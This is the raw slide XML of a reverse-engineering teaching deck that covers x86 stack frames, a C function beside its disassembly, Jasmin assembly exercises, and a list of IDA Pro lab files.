            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>eax, eax</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>004010xx mov </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>esp, ebp</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>004010xx pop </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>004010xx ret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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535"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Function call</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827640" y="1959120"/>
            <a:ext cx="2962080" cy="365796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int </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>adder</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(int a, int b)</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return a+b;</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void main()</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int x = 1;</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int y = 2;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>("the function returned the number %d\n", adder(x,y));</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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4744080" y="1818000"/>
            <a:ext cx="3755160" cy="228564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00401730 push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ebp</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00401731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ebp, esp</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00401733 mov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eax, [ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>arg_0</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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00401736 add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eax, [ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>arg_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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00401739 pop </a:t>
            </a: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ebp</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0040173A retn</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4744080" y="3645000"/>
            <a:ext cx="3755160" cy="448020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00401746 mov [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], 1</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0040174D mov [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], 2</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00401754 mov eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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00401757 push eax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00401758 mov ecx, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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0040175B push ecx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0040175C call adder</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00401761 add esp, 8</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00401764 push eax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00401765 push offset TheFunctionRet</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0040176A call ds:printf</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4009320" y="1774440"/>
            <a:ext cx="73404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adder</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089600" y="3812760"/>
            <a:ext cx="654120" cy="6397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main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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="69000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Practice [Assembly by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Jasmin </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>app.]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542"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Practice “Simple Instructions”</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="543" name="Google Shape;960;p95" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="467640" y="1989000"/>
            <a:ext cx="8363880" cy="4539240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097640" y="3501000"/>
            <a:ext cx="1043280" cy="63972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GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Registers</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3420000" y="2997000"/>
            <a:ext cx="668520" cy="63972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GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3754080" y="5085360"/>
            <a:ext cx="624960" cy="63972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GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Help</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444360" y="4437000"/>
            <a:ext cx="1004400" cy="63972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GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827640" y="4758480"/>
            <a:ext cx="660240" cy="63972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GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Flags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Practice Jasmin</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395640" y="1484640"/>
            <a:ext cx="2660400" cy="255996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GB" sz="1800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Storing results in Memory</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mov eax, 4</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mov ebx, 6</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mov [eax], ebx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mov ecx, eax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add ecx, ebx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mov [eax+4], ecx</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3564000" y="1484640"/>
            <a:ext cx="1275480" cy="283428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GB" sz="1800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Using Stack</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mov eax, 4</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mov ebx, 6</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push eax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push ebx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pop ecx</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940000" y="1484640"/>
            <a:ext cx="2914920" cy="201132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GB" sz="1800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Reversing a sequence</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Eax, ebx, ecx, edx = 1,2,3, 4</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-&gt; Eax, ebx, ecx, edx = 4,3,2,1</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259640" y="4005000"/>
            <a:ext cx="287640" cy="895680"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1129680" y="5169960"/>
            <a:ext cx="547200" cy="173700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EAX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EBX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ECX</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429960" y="5411880"/>
            <a:ext cx="287640" cy="447840"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4071960" y="5618160"/>
            <a:ext cx="547200" cy="146268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ESP</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EBP</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EIP</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4201560" y="4988160"/>
            <a:ext cx="287640" cy="447840"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="559" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1725840" y="4453200"/>
            <a:ext cx="291600" cy="3661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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619520" y="5031360"/>
            <a:ext cx="291600" cy="3661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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6701760" y="5487120"/>
            <a:ext cx="291600" cy="366120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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Practice 5 &amp; 6 [IDA Pro]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563"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Introduction to IDA Pro</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Examine C structures by IDA Pro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Lab05-01.dll (skip)</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Lab06-01.exe</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Lab06-02.exe</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Lab06-03.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Lab06-04.exe</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Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565"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Local &amp; global variables</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Operation +, -, ++, --, %</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Condition</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
